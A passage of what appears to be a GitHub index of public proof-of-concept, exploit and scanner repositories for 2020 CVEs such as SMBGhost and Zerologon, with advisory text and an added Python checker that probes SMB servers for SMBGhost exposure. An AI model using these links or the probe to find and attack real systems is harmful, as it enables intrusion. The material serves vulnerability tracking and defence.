- [cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION)
- [MasterSploit/CVE-2020-0787](https://github.com/MasterSploit/CVE-2020-0787)
- [MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master](https://github.com/MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master)
- [yanghaoi/CVE-2020-0787](https://github.com/yanghaoi/CVE-2020-0787)

### CVE-2020-0796 (2020-03-12)

A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.

- [k8gege/PyLadon](https://github.com/k8gege/PyLadon)
- [0x25bit/CVE-2020-0796-PoC](https://github.com/0x25bit/CVE-2020-0796-PoC)
- [technion/DisableSMBCompression](https://github.com/technion/DisableSMBCompression)
- [T13nn3s/CVE-2020-0796](https://github.com/T13nn3s/CVE-2020-0796)
- [ly4k/SMBGhost](https://github.com/ly4k/SMBGhost)
- [joaozietolie/CVE-2020-0796-Checker](https://github.com/joaozietolie/CVE-2020-0796-Checker)
- [ButrintKomoni/cve-2020-0796](https://github.com/ButrintKomoni/cve-2020-0796)
- [dickens88/cve-2020-0796-scanner](https://github.com/dickens88/cve-2020-0796-scanner)
- [kn6869610/CVE-2020-0796](https://github.com/kn6869610/CVE-2020-0796)
- [awareseven/eternalghosttest](https://github.com/awareseven/eternalghosttest)
- [xax007/CVE-2020-0796-Scanner](https://github.com/xax007/CVE-2020-0796-Scanner)
- [Dhoomralochana/Scanners-for-CVE-2020-0796-Testing](https://github.com/Dhoomralochana/Scanners-for-CVE-2020-0796-Testing)
- [UraSecTeam/smbee](https://github.com/UraSecTeam/smbee)
- [netscylla/SMBGhost](https://github.com/netscylla/SMBGhost)
- [eerykitty/CVE-2020-0796-PoC](https://github.com/eerykitty/CVE-2020-0796-PoC)
- [wneessen/SMBCompScan](https://github.com/wneessen/SMBCompScan)
- [ioncodes/SMBGhost](https://github.com/ioncodes/SMBGhost)
- [laolisafe/CVE-2020-0796](https://github.com/laolisafe/CVE-2020-0796)
- [gabimarti/SMBScanner](https://github.com/gabimarti/SMBScanner)
- [Almorabea/SMBGhost-WorkaroundApplier](https://github.com/Almorabea/SMBGhost-WorkaroundApplier)
- [vysecurity/CVE-2020-0796](https://github.com/vysecurity/CVE-2020-0796)
- [BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796](https://github.com/BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796)
- [w1ld3r/SMBGhost_Scanner](https://github.com/w1ld3r/SMBGhost_Scanner)
- [wsfengfan/CVE-2020-0796](https://github.com/wsfengfan/CVE-2020-0796)
- [GuoKerS/aioScan_CVE-2020-0796](https://github.com/GuoKerS/aioScan_CVE-2020-0796)
- [jiansiting/CVE-2020-0796-Scanner](https://github.com/jiansiting/CVE-2020-0796-Scanner)
- [maxpl0it/Unauthenticated-CVE-2020-0796-PoC](https://github.com/maxpl0it/Unauthenticated-CVE-2020-0796-PoC)
- [ran-sama/CVE-2020-0796](https://github.com/ran-sama/CVE-2020-0796)
- [sujitawake/smbghost](https://github.com/sujitawake/smbghost)
- [julixsalas/CVE-2020-0796](https://github.com/julixsalas/CVE-2020-0796)
- [cory-zajicek/CVE-2020-0796-DoS](https://github.com/cory-zajicek/CVE-2020-0796-DoS)
- [tripledd/cve-2020-0796-vuln](https://github.com/tripledd/cve-2020-0796-vuln)
- [danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796)
- [jamf/CVE-2020-0796-LPE-POC](https://github.com/jamf/CVE-2020-0796-LPE-POC)
- [TinToSer/CVE-2020-0796-LPE](https://github.com/TinToSer/CVE-2020-0796-LPE)
- [f1tz/CVE-2020-0796-LPE-EXP](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)
- [tango-j/CVE-2020-0796](https://github.com/tango-j/CVE-2020-0796)
- [jiansiting/CVE-2020-0796](https://github.com/jiansiting/CVE-2020-0796)
- [eastmountyxz/CVE-2020-0796-SMB](https://github.com/eastmountyxz/CVE-2020-0796-SMB)
- [LabDookhtegan/CVE-2020-0796-EXP](https://github.com/LabDookhtegan/CVE-2020-0796-EXP)
- [Rvn0xsy/CVE_2020_0796_CNA](https://github.com/Rvn0xsy/CVE_2020_0796_CNA)
- [0xeb-bp/cve-2020-0796](https://github.com/0xeb-bp/cve-2020-0796)
- [intelliroot-tech/cve-2020-0796-Scanner](https://github.com/intelliroot-tech/cve-2020-0796-Scanner)
- [jamf/CVE-2020-0796-RCE-POC](https://github.com/jamf/CVE-2020-0796-RCE-POC)
- [thelostworldFree/CVE-2020-0796](https://github.com/thelostworldFree/CVE-2020-0796)
- [section-c/CVE-2020-0796](https://github.com/section-c/CVE-2020-0796)
- [bacth0san96/SMBGhostScanner](https://github.com/bacth0san96/SMBGhostScanner)
- [halsten/CVE-2020-0796](https://github.com/halsten/CVE-2020-0796)
- [ysyyrps123/CVE-2020-0796](https://github.com/ysyyrps123/CVE-2020-0796)
- [ysyyrps123/CVE-2020-0796-exp](https://github.com/ysyyrps123/CVE-2020-0796-exp)
- [exp-sky/CVE-2020-0796](https://github.com/exp-sky/CVE-2020-0796)
- [Barriuso/SMBGhost_AutomateExploitation](https://github.com/Barriuso/SMBGhost_AutomateExploitation)
- [1060275195/SMBGhost](https://github.com/1060275195/SMBGhost)
- [Almorabea/SMBGhost-LPE-Metasploit-Module](https://github.com/Almorabea/SMBGhost-LPE-Metasploit-Module)
- [jamf/SMBGhost-SMBleed-scanner](https://github.com/jamf/SMBGhost-SMBleed-scanner)
- [rsmudge/CVE-2020-0796-BOF](https://github.com/rsmudge/CVE-2020-0796-BOF)
- [codewithpradhan/SMBGhost-CVE-2020-0796-](https://github.com/codewithpradhan/SMBGhost-CVE-2020-0796-)
- [AaronCaiii/CVE-2020-0796-POC](https://github.com/AaronCaiii/CVE-2020-0796-POC)
- [datntsec/CVE-2020-0796](https://github.com/datntsec/CVE-2020-0796)
- [MasterSploit/LPE---CVE-2020-0796](https://github.com/MasterSploit/LPE---CVE-2020-0796)
- [1stPeak/CVE-2020-0796-Scanner](https://github.com/1stPeak/CVE-2020-0796-Scanner)
- [Anonimo501/SMBGhost_CVE-2020-0796_checker](https://github.com/Anonimo501/SMBGhost_CVE-2020-0796_checker)
- [Opensitoo/cve-2020-0796](https://github.com/Opensitoo/cve-2020-0796)
- [orangmuda/CVE-2020-0796](https://github.com/orangmuda/CVE-2020-0796)
- [Murasame-nc/CVE-2020-0796-LPE-POC](https://github.com/Murasame-nc/CVE-2020-0796-LPE-POC)
- [F6JO/CVE-2020-0796-Batch-scanning](https://github.com/F6JO/CVE-2020-0796-Batch-scanning)
- [lisinan988/CVE-2020-0796-exp](https://github.com/lisinan988/CVE-2020-0796-exp)
- [vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-](https://github.com/vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-)
- [arzuozkan/CVE-2020-0796](https://github.com/arzuozkan/CVE-2020-0796)
- [SEHandler/CVE-2020-0796](https://github.com/SEHandler/CVE-2020-0796)
- [TweatherQ/CVE-2020-0796](https://github.com/TweatherQ/CVE-2020-0796)
- [krizzz07/CVE-2020-0796](https://github.com/krizzz07/CVE-2020-0796)
- [OldDream666/cve-2020-0796](https://github.com/OldDream666/cve-2020-0796)
- [Ajomix/CVE-2020-0796](https://github.com/Ajomix/CVE-2020-0796)
- [hungdnvp/POC-CVE-2020-0796](https://github.com/hungdnvp/POC-CVE-2020-0796)
- [AdamSonov/smbGhostCVE-2020-0796](https://github.com/AdamSonov/smbGhostCVE-2020-0796)
- [z3ena/Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities](https://github.com/z3ena/Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities)
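The description above is Microsoft's generic wording; the repository names in the list (DisableSMBCompression, SMBCompScan, SMBGhost-WorkaroundApplier) point at the detail that matters for detection: the flaw is in SMB 3.1.1 compression, so a server is exposed when it negotiates dialect 0x0311 and advertises a compression algorithm in its NEGOTIATE response, and Microsoft's workaround removes that advertisement. The module below is an added example, not code from this index or from any repository listed here. It builds the negotiate probe, parses the server's response according to the MS-SMB2 field layouts, and makes the decision; the sample responses are constructed inline so the logic runs offline, and the client capability bits sent in the request are an assumption.

```python
"""Added example: SMBGhost exposure check from an SMB2 NEGOTIATE response."""
import socket
import struct
import uuid

SMB2_DIALECT_311 = 0x0311
CTX_PREAUTH_INTEGRITY = 0x0001
CTX_COMPRESSION = 0x0003
COMPRESSION_NONE = 0x0000


def _ctx(ctx_type, data):
    """SMB2_NEGOTIATE_CONTEXT: type(2) length(2) reserved(4) data, padded to 8 bytes."""
    raw = struct.pack("<HHI", ctx_type, len(data), 0) + data
    return raw + bytes(-len(raw) % 8)


def _header(command=0, flags=0):
    """64-byte SMB2 header; flags=1 marks a server-to-client message."""
    return (b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, command, 1, flags, 0, 0, 0, 0, 0)
            + bytes(16))


def build_negotiate_request():
    """Client NEGOTIATE offering 2.0.2 .. 3.1.1 with preauth-integrity and compression
    contexts, so a 3.1.1 server answers with its compression capabilities."""
    dialects = [0x0202, 0x0210, 0x0300, 0x0302, SMB2_DIALECT_311]
    ctx_offset = (64 + 36 + 2 * len(dialects) + 7) & ~7       # header + fixed body + dialects
    contexts = (_ctx(CTX_PREAUTH_INTEGRITY, struct.pack("<HHH", 1, 32, 1) + bytes(32))  # zero salt: probe only
                + _ctx(CTX_COMPRESSION, struct.pack("<HHI3H", 3, 0, 0, 1, 2, 3)))
    body = (struct.pack("<HHHHI", 36, len(dialects), 1, 0, 0x7f)   # 0x7f capabilities: assumed
            + uuid.uuid4().bytes + struct.pack("<IHH", ctx_offset, 2, 0)
            + struct.pack("<%dH" % len(dialects), *dialects))
    msg = _header() + body
    return msg + bytes(ctx_offset - len(msg)) + contexts


def parse_negotiate_response(smb2):
    """Return (dialect, [compression algorithm ids]) from a server NEGOTIATE response."""
    if len(smb2) < 128 or smb2[:4] != b"\xfeSMB" or struct.unpack_from("<H", smb2, 12)[0] != 0:
        raise ValueError("not an SMB2 NEGOTIATE message")
    size, _mode, dialect, ctx_count = struct.unpack_from("<HHHH", smb2, 64)
    if size != 65:
        raise ValueError("bad NEGOTIATE response StructureSize")
    off = struct.unpack_from("<I", smb2, 64 + 60)[0]        # NegotiateContextOffset
    algos = []
    for _ in range(ctx_count if dialect == SMB2_DIALECT_311 else 0):
        ctx_type, data_len = struct.unpack_from("<HH", smb2, off)
        if ctx_type == CTX_COMPRESSION:
            count = struct.unpack_from("<H", smb2, off + 8)[0]
            algos = list(struct.unpack_from("<%dH" % count, smb2, off + 16))
        off += (8 + data_len + 7) & ~7                        # contexts are 8-byte aligned
    return dialect, algos


def is_exposed(smb2):
    """SMBGhost precondition: dialect 3.1.1 plus at least one real compression algorithm."""
    dialect, algos = parse_negotiate_response(smb2)
    return dialect == SMB2_DIALECT_311 and any(a != COMPRESSION_NONE for a in algos)


def build_sample_response(algorithms=(), dialect=SMB2_DIALECT_311):
    """Constructed server reply for offline use. No algorithms means no compression
    context, which is what a server with the DisableCompression workaround sends."""
    contexts = []
    if dialect == SMB2_DIALECT_311:
        contexts.append(_ctx(CTX_PREAUTH_INTEGRITY, struct.pack("<HHH", 1, 32, 1) + b"\x11" * 32))
        if algorithms:
            contexts.append(_ctx(CTX_COMPRESSION, struct.pack("<HHI%dH" % len(algorithms),
                                                              len(algorithms), 0, 0, *algorithms)))
    ctx_offset = 128 if contexts else 0
    body = (struct.pack("<HHHH", 65, 1, dialect, len(contexts)) + bytes(16)
            + struct.pack("<IIIIQQ", 0, 0x800000, 0x800000, 0x800000, 0, 0)
            + struct.pack("<HHI", 128, 0, ctx_offset))
    return _header(flags=1) + body + b"".join(contexts)


def probe(host, port=445, timeout=5):
    """Live check over TCP/445 with NetBIOS session framing (4-byte big-endian length)."""
    req = build_negotiate_request()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(struct.pack(">I", len(req)) + req)
        length = int.from_bytes(s.recv(4)[1:], "big")
        data = b""
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                raise ConnectionError("short read")
            data += chunk
    return is_exposed(data)
```

A negative result from `is_exposed` only says the precondition is absent (no 3.1.1, or no compression offered); it does not prove the host is patched. A positive result on a host that has the March 2020 update is possible if compression was re-enabled, so the check is a triage signal, not a patch audit.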

### CVE-2020-0887 (2020-03-12)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0788, CVE-2020-0877.

- [vinhthp1712/CVE-2020-0887](https://github.com/vinhthp1712/CVE-2020-0887)

### CVE-2020-0890 (2020-09-11)

A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system. To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application. The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests.

- [gerhart01/hyperv_local_dos_poc](https://github.com/gerhart01/hyperv_local_dos_poc)
- [skasanagottu57gmailv/gerhart01](https://github.com/skasanagottu57gmailv/gerhart01)
- [MarcelloTinocor/gerhart01](https://github.com/MarcelloTinocor/gerhart01)

### CVE-2020-0910 (2020-04-15)

A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Windows Hyper-V Remote Code Execution Vulnerability'.

- [kfmgang/CVE-2020-0910](https://github.com/kfmgang/CVE-2020-0910)

### CVE-2020-0976 (2020-04-15)

A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-0972, CVE-2020-0975, CVE-2020-0977.

- [ericzhong2010/GUI-Check-CVE-2020-0976](https://github.com/ericzhong2010/GUI-Check-CVE-2020-0976)

### CVE-2020-1015 (2020-04-15)

An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0934, CVE-2020-0983, CVE-2020-1009, CVE-2020-1011.

- [0xeb-bp/cve-2020-1015](https://github.com/0xeb-bp/cve-2020-1015)

### CVE-2020-1020 (2020-04-15)

A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font (Adobe Type 1 PostScript format). For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0938.

- [CrackerCat/CVE-2020-1020-Exploit](https://github.com/CrackerCat/CVE-2020-1020-Exploit)
- [KaLendsi/CVE-2020-1020](https://github.com/KaLendsi/CVE-2020-1020)

### CVE-2020-1034 (2020-09-11)

An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application. The security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.

- [yardenshafir/CVE-2020-1034](https://github.com/yardenshafir/CVE-2020-1034)
- [GeorgiiFirsov/CVE-2020-1034](https://github.com/GeorgiiFirsov/CVE-2020-1034)

### CVE-2020-1048 (2020-05-21)

An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1070.

- [zveriu/CVE-2009-0229-PoC](https://github.com/zveriu/CVE-2009-0229-PoC)
- [shubham0d/CVE-2020-1048](https://github.com/shubham0d/CVE-2020-1048)
- [Ken-Abruzzi/CVE-2020-1048](https://github.com/Ken-Abruzzi/CVE-2020-1048)
- [Y3A/cve-2020-1048](https://github.com/Y3A/cve-2020-1048)

### CVE-2020-1054 (2020-05-21)

An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143.

- [0xeb-bp/cve-2020-1054](https://github.com/0xeb-bp/cve-2020-1054)
- [Iamgublin/CVE-2020-1054](https://github.com/Iamgublin/CVE-2020-1054)
- [KaLendsi/CVE-2020-1054](https://github.com/KaLendsi/CVE-2020-1054)
- [Graham382/CVE-2020-1054](https://github.com/Graham382/CVE-2020-1054)

### CVE-2020-1066 (2020-05-21)

An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. The update addresses the vulnerability by correcting how .NET Framework activates COM objects, aka '.NET Framework Elevation of Privilege Vulnerability'.

- [cbwang505/CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP)
- [xyddnljydd/cve-2020-1066](https://github.com/xyddnljydd/cve-2020-1066)

### CVE-2020-1102 (2020-05-21)

A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1023, CVE-2020-1024.

- [DanielRuf/snyk-js-jquery-565129](https://github.com/DanielRuf/snyk-js-jquery-565129)

### CVE-2020-1206 (2020-06-09)

An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Information Disclosure Vulnerability'.

- [jamf/CVE-2020-1206-POC](https://github.com/jamf/CVE-2020-1206-POC)
- [Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit)
- [Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit)
- [datntsec/CVE-2020-1206](https://github.com/datntsec/CVE-2020-1206)

### CVE-2020-1283 (2020-06-09)

A denial of service vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Denial of Service Vulnerability'.

- [RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability](https://github.com/RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability)

### CVE-2020-1301 (2020-06-09)

A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests, aka 'Windows SMB Remote Code Execution Vulnerability'.

- [shubham0d/CVE-2020-1301](https://github.com/shubham0d/CVE-2020-1301)

### CVE-2020-1313 (2020-06-09)

An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations, aka 'Windows Update Orchestrator Service Elevation of Privilege Vulnerability'.

- [irsl/CVE-2020-1313](https://github.com/irsl/CVE-2020-1313)

### CVE-2020-1337 (2020-08-17)

An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted script or application.

The update addresses the vulnerability by correcting how the Windows Print Spooler Component writes to the file system.

- [math1as/CVE-2020-1337-exploit](https://github.com/math1as/CVE-2020-1337-exploit)
- [VoidSec/CVE-2020-1337](https://github.com/VoidSec/CVE-2020-1337)
- [neofito/CVE-2020-1337](https://github.com/neofito/CVE-2020-1337)
- [sailay1996/cve-2020-1337-poc](https://github.com/sailay1996/cve-2020-1337-poc)
- [ZTK-009/cve-2020-1337-poc](https://github.com/ZTK-009/cve-2020-1337-poc)

### CVE-2020-1349 (2020-07-14)

A remote code execution vulnerability exists in Microsoft Outlook software when it fails to properly handle objects in memory, aka 'Microsoft Outlook Remote Code Execution Vulnerability'.

- [0neb1n/CVE-2020-1349](https://github.com/0neb1n/CVE-2020-1349)

### CVE-2020-1350 (2020-07-14)

A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests, aka 'Windows DNS Server Remote Code Execution Vulnerability'.

- [psc4re/NSE-scripts](https://github.com/psc4re/NSE-scripts)
- [ZephrFish/CVE-2020-1350_HoneyPoC](https://github.com/ZephrFish/CVE-2020-1350_HoneyPoC)
- [mr-r3b00t/CVE-2020-1350](https://github.com/mr-r3b00t/CVE-2020-1350)
- [zoomerxsec/Fake_CVE-2020-1350](https://github.com/zoomerxsec/Fake_CVE-2020-1350)
- [T13nn3s/CVE-2020-1350](https://github.com/T13nn3s/CVE-2020-1350)
- [corelight/SIGRed](https://github.com/corelight/SIGRed)
- [jmaddington/dRMM-CVE-2020-1350-response](https://github.com/jmaddington/dRMM-CVE-2020-1350-response)
- [maxpl0it/CVE-2020-1350-DoS](https://github.com/maxpl0it/CVE-2020-1350-DoS)
- [captainGeech42/CVE-2020-1350](https://github.com/captainGeech42/CVE-2020-1350)
- [connormcgarr/CVE-2020-1350](https://github.com/connormcgarr/CVE-2020-1350)
- [graph-inc/CVE-2020-1350](https://github.com/graph-inc/CVE-2020-1350)
- [CVEmaster/CVE-2020-1350](https://github.com/CVEmaster/CVE-2020-1350)
- [gdwnet/cve-2020-1350](https://github.com/gdwnet/cve-2020-1350)
- [simeononsecurity/CVE-2020-1350-Fix](https://github.com/simeononsecurity/CVE-2020-1350-Fix)

### CVE-2020-1362 (2020-07-14)

An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1344, CVE-2020-1369.

- [Q4n/CVE-2020-1362](https://github.com/Q4n/CVE-2020-1362)

### CVE-2020-1472 (2020-08-17)

An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network.

To exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access.

Microsoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how Netlogon handles the usage of Netlogon secure channels.

For guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (updated September 28, 2020).

When the second phase of Windows updates become available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See Microsoft Technical Security Notifications.

- [Tobey123/CVE-2020-1472-visualizer](https://github.com/Tobey123/CVE-2020-1472-visualizer)
- [SecuraBV/CVE-2020-1472](https://github.com/SecuraBV/CVE-2020-1472)
- [cube0x0/CVE-2020-1472](https://github.com/cube0x0/CVE-2020-1472)
- [dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472)
- [VoidSec/CVE-2020-1472](https://github.com/VoidSec/CVE-2020-1472)
- [risksense/zerologon](https://github.com/risksense/zerologon)
- [bb00/zer0dump](https://github.com/bb00/zer0dump)
- [0xkami/CVE-2020-1472](https://github.com/0xkami/CVE-2020-1472)
- [NAXG/CVE-2020-1472](https://github.com/NAXG/CVE-2020-1472)
- [thatonesecguy/zerologon-CVE-2020-1472](https://github.com/thatonesecguy/zerologon-CVE-2020-1472)
- [k8gege/CVE-2020-1472-EXP](https://github.com/k8gege/CVE-2020-1472-EXP)
- [jiushill/CVE-2020-1472](https://github.com/jiushill/CVE-2020-1472)
- [McKinnonIT/zabbix-template-CVE-2020-1472](https://github.com/McKinnonIT/zabbix-template-CVE-2020-1472)
- [mstxq17/cve-2020-1472](https://github.com/mstxq17/cve-2020-1472)
- [Fa1c0n35/CVE-2020-1472](https://github.com/Fa1c0n35/CVE-2020-1472)
- [Fa1c0n35/SecuraBV-CVE-2020-1472](https://github.com/Fa1c0n35/SecuraBV-CVE-2020-1472)
- [CanciuCostin/CVE-2020-1472](https://github.com/CanciuCostin/CVE-2020-1472)
- [0xcccc666/cve-2020-1472_Tool-collection](https://github.com/0xcccc666/cve-2020-1472_Tool-collection)
- [murataydemir/CVE-2020-1472](https://github.com/murataydemir/CVE-2020-1472)
- [npocmak/CVE-2020-1472](https://github.com/npocmak/CVE-2020-1472)
- [victim10wq3/CVE-2020-1472](https://github.com/victim10wq3/CVE-2020-1472)
- [zeronetworks/zerologon](https://github.com/zeronetworks/zerologon)
- [sv3nbeast/CVE-2020-1472](https://github.com/sv3nbeast/CVE-2020-1472)
- [midpipps/CVE-2020-1472-Easy](https://github.com/midpipps/CVE-2020-1472-Easy)
- [hectorgie/CVE-2020-1472](https://github.com/hectorgie/CVE-2020-1472)
- [johnpathe/zerologon-cve-2020-1472-notes](https://github.com/johnpathe/zerologon-cve-2020-1472-notes)
- [t31m0/CVE-2020-1472](https://github.com/t31m0/CVE-2020-1472)
- [grupooruss/CVE-2020-1472](https://github.com/grupooruss/CVE-2020-1472)
- [striveben/CVE-2020-1472](https://github.com/striveben/CVE-2020-1472)
- [Fa1c0n35/CVE-2020-1472-02-](https://github.com/Fa1c0n35/CVE-2020-1472-02-)
- [Whippet0/CVE-2020-1472](https://github.com/Whippet0/CVE-2020-1472)
- [WiIs0n/Zerologon_CVE-2020-1472](https://github.com/WiIs0n/Zerologon_CVE-2020-1472)
- [Privia-Security/ADZero](https://github.com/Privia-Security/ADZero)
- [Ken-Abruzzi/cve-2020-1472](https://github.com/Ken-Abruzzi/cve-2020-1472)
- [rhymeswithmogul/Set-ZerologonMitigation](https://github.com/rhymeswithmogul/Set-ZerologonMitigation)
- [shanfenglan/cve-2020-1472](https://github.com/shanfenglan/cve-2020-1472)
- [maikelnight/zerologon](https://github.com/maikelnight/zerologon)
- [CPO-EH/CVE-2020-1472_ZeroLogonChecker](https://github.com/CPO-EH/CVE-2020-1472_ZeroLogonChecker)
- [puckiestyle/CVE-2020-1472](https://github.com/puckiestyle/CVE-2020-1472)
- [mingchen-script/CVE-2020-1472-visualizer](https://github.com/mingchen-script/CVE-2020-1472-visualizer)
- [JayP232/The_big_Zero](https://github.com/JayP232/The_big_Zero)
- [b1ack0wl/CVE-2020-1472](https://github.com/b1ack0wl/CVE-2020-1472)
- [SaharAttackit/CVE-2020-1472](https://github.com/SaharAttackit/CVE-2020-1472)
- [wrathfulDiety/zerologon](https://github.com/wrathfulDiety/zerologon)
- [YossiSassi/ZeroLogon-Exploitation-Check](https://github.com/YossiSassi/ZeroLogon-Exploitation-Check)
- [sho-luv/zerologon](https://github.com/sho-luv/zerologon)
- [hell-moon/ZeroLogon-Exploit](https://github.com/hell-moon/ZeroLogon-Exploit)
- [Udyz/Zerologon](https://github.com/Udyz/Zerologon)
- [itssmikefm/CVE-2020-1472](https://github.com/itssmikefm/CVE-2020-1472)
- [B34MR/zeroscan](https://github.com/B34MR/zeroscan)
- [TheJoyOfHacking/SecuraBV-CVE-2020-1472](https://github.com/TheJoyOfHacking/SecuraBV-CVE-2020-1472)
- [TheJoyOfHacking/dirkjanm-CVE-2020-1472](https://github.com/TheJoyOfHacking/dirkjanm-CVE-2020-1472)
- [Anonymous-Family/Zero-day-scanning](https://github.com/Anonymous-Family/Zero-day-scanning)
- [Anonymous-Family/CVE-2020-1472](https://github.com/Anonymous-Family/CVE-2020-1472)
- [carlos55ml/zerologon](https://github.com/carlos55ml/zerologon)
- [Rvn0xsy/ZeroLogon](https://github.com/Rvn0xsy/ZeroLogon)
- [guglia001/MassZeroLogon](https://github.com/guglia001/MassZeroLogon)
- [likeww/MassZeroLogon](https://github.com/likeww/MassZeroLogon)
- [dr4g0n23/CVE-2020-1472](https://github.com/dr4g0n23/CVE-2020-1472)
- [RicYaben/CVE-2020-1472-LAB](https://github.com/RicYaben/CVE-2020-1472-LAB)
- [Akash7350/CVE-2020-1472](https://github.com/Akash7350/CVE-2020-1472)
- [c3rrberu5/ZeroLogon-to-Shell](https://github.com/c3rrberu5/ZeroLogon-to-Shell)
- [logg-1/0logon](https://github.com/logg-1/0logon)
- [whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC](https://github.com/whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC)
- [JolynNgSC/Zerologon_CVE-2020-1472](https://github.com/JolynNgSC/Zerologon_CVE-2020-1472)
- [blackh00d/zerologon-poc](https://github.com/blackh00d/zerologon-poc)

### CVE-2020-1493 (2020-08-17)

An information disclosure vulnerability exists when attaching files to Outlook messages. This vulnerability could potentially allow users to share attached files such that they are accessible by anonymous users where they should be restricted to specific users.

To exploit this vulnerability, an attacker would have to attach a file as a link to an email. The email could then be shared with individuals that should not have access to the files, ignoring the default organizational setting.

The security update addresses the vulnerability by correcting how Outlook handles file attachment links.

- [0neb1n/CVE-2020-1493](https://github.com/0neb1n/CVE-2020-1493)

### CVE-2020-1611 (2020-01-15)

A Local File Inclusion vulnerability in Juniper Networks Junos Space allows an attacker to view all files on the target when the device receives malicious HTTP packets. This issue affects: Juniper Networks Junos Space versions prior to 19.4R1.

- [Ibonok/CVE-2020-1611](https://github.com/Ibonok/CVE-2020-1611)

### CVE-2020-1764 (2020-03-26)

A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.

- [jpts/cve-2020-1764-poc](https://github.com/jpts/cve-2020-1764-poc)

### CVE-2020-1937 (2020-02-24)

Kylin has some RESTful APIs which concatenate SQL with the user input string, so a user is likely able to run malicious database queries.
